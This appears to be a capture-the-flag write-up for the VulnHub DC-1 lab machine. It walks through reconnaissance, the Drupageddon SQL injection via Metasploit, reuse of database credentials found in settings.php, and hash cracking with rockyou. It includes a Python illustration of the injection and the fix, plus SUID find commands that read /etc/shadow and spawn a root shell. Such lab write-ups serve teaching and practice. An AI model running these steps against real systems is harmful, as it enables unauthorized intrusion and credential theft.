VulnHub DC-1

VulnHub DC-1 is a CTF hacking challenge. Working through the DC-1 machine from VulnHub teaches the full chain you would use on a real target: network recon, a CMS exploit, credential reuse, password cracking and a privilege escalation.

I have described every step here, with screenshots and the corresponding output, which should remove any confusion; the writeup may look long because of the screenshots, but the whole box is about a ten-minute job.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

Discover the machine on the network with netdiscover or an nmap range scan.
Run netdiscover against your whole network or, if you know which interface VMware uses, against vmnet0, vmnet1 (Host-Only) or vmnet8 (NAT):
netdiscover -i vmnet8
Add the machine's IP to /etc/hosts under the name dc-1, so it can be referred to as dc-1 from here on.
Now run an nmap service/version scan to find the open ports, the services behind them and their version numbers.

Running the nmap command in a terminal gives this output:

nmap scan of dc-1

From the nmap result we see that Drupal 7 is hosted on port 80:
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

That is a reasonable attack surface. We start with Drupal: open the machine's IP in a browser to explore the Drupal 7 site.
We could try some user enumeration on the Drupal login page in case we get lucky,
or go straight to the exploits we have in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In Metasploit we search for Drupal exploits:

Search drupal in metasploit

From the list we get, we pick one of the exploits and load it with use.

Prefer one ranked Excellent, although that is not mandatory.
We choose exploit/multi/http/drupal_drupageddon, the module for CVE-2014-3704 (SA-CORE-2014-005), an unauthenticated SQL injection in Drupal 7.0 through 7.31 that was fixed in 7.32; it needs no credentials, only a reachable Drupal 7 site of a vulnerable version.
In msfconsole type: use exploit/multi/http/drupal_drupageddon
To see the options this module takes, type show options.

Set RHOSTS (RHOST on older Metasploit releases) to dc-1 or the machine's IP.

Everything is now set, so type run or exploit to launch it.
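To see what drupal_drupageddon is actually abusing, here is a simplified Python port, written for this writeup and not taken from Drupal or the Metasploit module, of the array-placeholder expansion in Drupal 7's database layer (CVE-2014-3704), shown in its pre-7.32 form beside the 7.32 fix. The login query and the injected statement are constructed stand-ins for the illustration, not Drupal's exact SQL or the module's payload; the input models the array PHP builds from a POST body such as name[0 ;...]=a&name[0]=b.

```python
import re

# Added illustration for this page: a Python port of the array-placeholder
# expansion in Drupal 7's DatabaseConnection::expandArguments(), before and
# after the 7.32 fix for CVE-2014-3704 (Drupageddon). Not Drupal's or the
# Metasploit module's own code.


def _expand(query, args, use_keys):
    """Expand an array-valued placeholder (:name -> :name_0, :name_1, ...).

    use_keys=True mirrors the pre-7.32 code: the suffix is the array KEY,
    which an attacker controls when the array comes from a PHP request
    parameter such as name[<anything>]=value.
    use_keys=False mirrors the fix, which iterates array_values() so the
    suffixes are always 0..n-1 whatever the keys were.
    """
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        if use_keys:
            new_keys = {f"{key}_{i}": v for i, v in data.items()}
        else:
            new_keys = {f"{key}_{i}": v for i, v in enumerate(data.values())}
        placeholders = ", ".join(new_keys)
        # \b mirrors Drupal's preg_replace('#:name\b#', ...) so that :name
        # does not clobber :name_extra; the lambda keeps the replacement
        # text literal even if it contains backslashes.
        query = re.sub(re.escape(key) + r"\b", lambda _m: placeholders, query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_arguments_vulnerable(query, args):
    """Drupal 7.0 - 7.31 behaviour."""
    return _expand(query, args, use_keys=True)


def expand_arguments_fixed(query, args):
    """Drupal 7.32+ behaviour."""
    return _expand(query, args, use_keys=False)


# Constructed input. PHP decodes the POST body
#   name[0 ;INJECTED_STATEMENT ;#]=a&name[0]=b
# into the array {'0 ;INJECTED_STATEMENT ;#': 'a', '0': 'b'}; the query is a
# simplified stand-in for the login lookup, not Drupal's exact SQL.
LOGIN_QUERY = "SELECT * FROM users WHERE name IN (:name) AND status = 1"
ATTACKER_ARGS = {":name": {"0 ;INJECTED_STATEMENT ;#": "a", "0": "b"}}


def demo():
    """Return the query text each version would hand to the database driver."""
    vulnerable_query, _ = expand_arguments_vulnerable(LOGIN_QUERY, ATTACKER_ARGS)
    fixed_query, _ = expand_arguments_fixed(LOGIN_QUERY, ATTACKER_ARGS)
    return vulnerable_query, fixed_query


if __name__ == "__main__":
    for label, q in zip(("vulnerable", "fixed"), demo()):
        print(f"{label:>10}: {q}")
```

In the vulnerable version the attacker's key lands inside the SQL text, so after the driver substitutes the bound value for :name_0 (Drupal 7 on MySQL used PDO with emulated prepares) the text after the first semicolon runs as a second statement; that write primitive is what the Metasploit module builds on. The fixed version throws the keys away and only ever emits :name_0, :name_1 and so on. A benign array such as {0: 1, 1: 2} expands identically in both versions, which is why the fix broke nothing.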

We now have a reverse Meterpreter session. The first thing to do on any box you land on is find out who you are, because that determines what you are allowed to do: type getuid. Here we are www-data, the Apache user.

Listing the current directory with ls gives us the first flag, flag1.txt.

flag1

The contents of flag1.txt are a hint pointing at the Drupal CMS config file.

I searched Google and found that the Drupal config file is at sites/default/settings.php.

We view settings.php with cat settings.php.

Near the top of the file we find the second flag, and further down the $databases array with the username and password for the Drupal database on dc-1.

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

To use those credentials we first upgrade to a proper pseudo-TTY shell (spawned with Python's pty module), since the interactive mysql client does not behave in a bare reverse shell, and then connect to the database.

We browse the drupal database looking for anything worthwhile.

A CMS database normally holds account data, so we explore it further for usernames and passwords.

We check the users table.

It holds usernames and password hashes (Drupal 7 hashes start with $S$). Hashes are not decrypted but cracked, so we try hashcat (mode 7900, Drupal7), john (--format=Drupal7) or whichever tool you prefer.

I copied the hash into a separate file, say hash.txt, and used one of the Kali Linux default wordlists, rockyou.txt. You can find it with locate rockyou.txt.

Once the hash is cracked we know the admin's password: 53cr3t

Now we log in to the Drupal site on dc-1 and explore further; under the Content menu we find the third flag, flag3, which says:

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit makes an executable run with the privileges of the file's owner instead of the user who launched it, so a root-owned SUID binary runs as root whoever invokes it. The hint is to find such binaries, so run the command to find out.

We see that the find command has the SUID bit set and is owned by root. We saw earlier that we are www-data, but anything find does, including whatever it runs through -exec, happens with root's effective uid.
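As an added example for this writeup (not the author's command), here is the enumeration step in Python: walk the filesystem and report regular files with the setuid bit, the same check `find / -perm -4000 -type f 2>/dev/null` performs, plus a filter for the root-owned ones that actually matter for escalation. The demo_setup() fixture builds a scratch directory with one setuid file and one plain file so the check can be exercised without touching the real system.

```python
import os
import stat
import tempfile

# Added example for this page: enumerate setuid executables and keep the
# root-owned ones. Equivalent to: find / -perm -4000 -type f 2>/dev/null


def find_suid(root="/"):
    """Return sorted (path, owner_uid) pairs for regular files under root
    whose mode has the setuid bit. Unreadable directories and vanished
    files are skipped, which is what the 2>/dev/null does for find."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def root_suid(root="/"):
    """Only root-owned setuid binaries give an unprivileged user root's
    effective uid; a setuid file owned by anyone else just becomes them."""
    return [path for path, uid in find_suid(root) if uid == 0]


def demo_setup():
    """Constructed fixture: a scratch directory with one setuid file and one
    plain file, both owned by the current user. Returns
    (directory, setuid_path, plain_path, current_uid)."""
    directory = tempfile.mkdtemp(prefix="suid-demo-")
    setuid_path = os.path.join(directory, "finder")
    plain_path = os.path.join(directory, "plain")
    for p in (setuid_path, plain_path):
        with open(p, "w"):
            pass
    os.chmod(setuid_path, 0o4755)   # rwsr-xr-x, like /usr/bin/find on DC-1
    os.chmod(plain_path, 0o755)     # rwxr-xr-x, no setuid bit
    return directory, setuid_path, plain_path, os.getuid()


if __name__ == "__main__":
    for path in root_suid("/"):
        print(path)
```

On DC-1 the list includes /usr/bin/find, which is why the flag3 hint mentions -exec: find's -exec runs its child with the same effective uid, so `find /etc/shadow -exec cat {} \;` reads the shadow file and `find . -exec /bin/sh -p \; -quit` gives a root shell (the -p stops bash from resetting its effective uid to the real one). When reading the output of the enumeration, also check the owner column: only the uid 0 entries are privilege-escalation candidates.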

We take a look at /etc/passwd, which is always worth reading on a Linux box.

Guess what: there is a user named flag4 in /etc/passwd. Its password hash lives in /etc/shadow, which the SUID find lets us read, so we crack that hash the same way as before with john or hashcat.

The flag4 values are altered in the picture because I was having fun with the machine.

Now for the final flag. Navigating to /root gives a permission-denied error, so we need to elevate our privileges; let's check whether the SUID find lets us.

Check who we are with whoami: we are root.
Let's get the final flag.

That completes this VulnHub machine. We will post more interesting CTFs soon, and each step of every CTF will be covered in detail in a separate post.
